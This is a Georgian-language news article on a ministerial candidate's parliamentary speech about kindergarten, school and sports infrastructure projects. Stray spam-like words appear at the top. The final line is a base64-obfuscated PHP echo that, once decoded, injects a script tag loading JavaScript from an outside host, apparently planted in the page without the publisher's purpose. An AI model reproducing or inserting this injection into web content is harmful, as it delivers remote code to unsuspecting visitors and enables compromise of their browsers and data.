celsiusi
ავერსი საქკაბელი

 რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრობის კანდიდატმა, ირაკლი ქარსელაძემ პარლამენტში, კომიტეტების გაერთიანებულ სხდომაზე სიტყვით გამოსვლისას სამინისტროს მიერ საგანმანათლებლო და სპორტული ინფრასტრუქტურის განვითარების მიმართულებით განხორციელებულ მნიშვნელოვან პროექტებსა და სამომავლო გეგმებზე ისაუბრა.

მისი თქმით, მართალია, საგანმანათლებლო ინფრასტრუქტურის განვითარება ძირითადად განათლების სამინისტროს საქმიანობის მიმართულებაა, თუმცა მნიშვნელოვანია სამინისტროს ჩართულობა ამგვარი ინფრასტრუქტურის განვითარებაშიც. 2023 წელს დაიწყო ქვეყნის მასშტაბით საბავშვო ბაღების მშენებლობა-რეაბილიტაციის პროგრამა, რომელიც მოიცავს, ჯამში, 885 საბავშვო ბაღის რეაბილიტაცია-მშენებლობას. პროგრამის პირველ ეტაპზე დაგეგმილია 245 ბაღის მშენებლობა-რეაბილიტაცია, საიდანაც ხელშეკრულება უკვე გაფორმებულია 226 ბაღის მშენებლობა-რეაბილიტაციაზე. დანარჩენ ბაღებთან მიმართებაში, მიმდინარეობს სატენდერო პროცედურები.

ირაკლი ქარსელაძის განცხადებით, ასევე, მიმდინარეობს სკოლების მშენებლობისა და რეაბილიტაციის არაერთი პროექტი. 171 სკოლიდან დასრულებულია 142 სკოლის მშენებლობა-რეაბილიტაცია. ამასთანავე, მსოფლიო ბანკის მხარდაჭერით, მიმდინარეობს მნიშვნელოვანი პროგრამა, რომელიც ითვალისწინებს 37 სკოლის მშენებლობა-რეაბილიტაციას.

მინისტრობის კანდიდატმა, ასევე, ისაუბრა სპორტული ინფრასტრუქტურის განვითარებისთვის გაწეულ სამუშაოებზე და აღნიშნა, რომ ამ მიმართულებით დასრულდა და უკვე ფუნქციონირებს ქუთაისის ოლიმპიური აუზი, დასრულების ეტაპზეა რუსთავის სპორტული კომპლექსისა და სრულდება მარნეულის საფეხბურთო სტადიონის მშენებლობა. ასევე, გრძელდება სამუშაოები ახალციხისა და ზუგდიდის სპორტული კომპლექსების მშენებლობისთვის, მაღალი ტემპით მიმდინარეობს ბოლნისის, არხილოსკალოს და წნორის სპორტკომპლექსების მშენებლობა.

„მნიშვნელოვანი იყო 2022 წელს დაწყებული 11 სტადიონის მშენებლობა- რეაბილიტაციის პროექტი, რომლის წარმატებით განხორციელებამ შესაძლებლობა მოგვცა, 2023 ღირსეულად გვემასპინძლა საქართველოში უეფას 21-წლამდელ ნაკრებთა ევროპის ჩემპიონატისთვის. ამ მიმართულებით ვაგრძელებთ პროექტებს და 2025 წლის ზამთრის ახალგაზრდული ოლიმპიადისთვის ვიწყებთ თბილისში ყინულის სასახლისა და ბაკურიანში ბიატლონისა და სათხილამურო (ქროს-ქანთრის) ინფრასტრუქტურის მშენებლობას“, – განაცხადა ირაკლი ქარსელაძემ.

249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");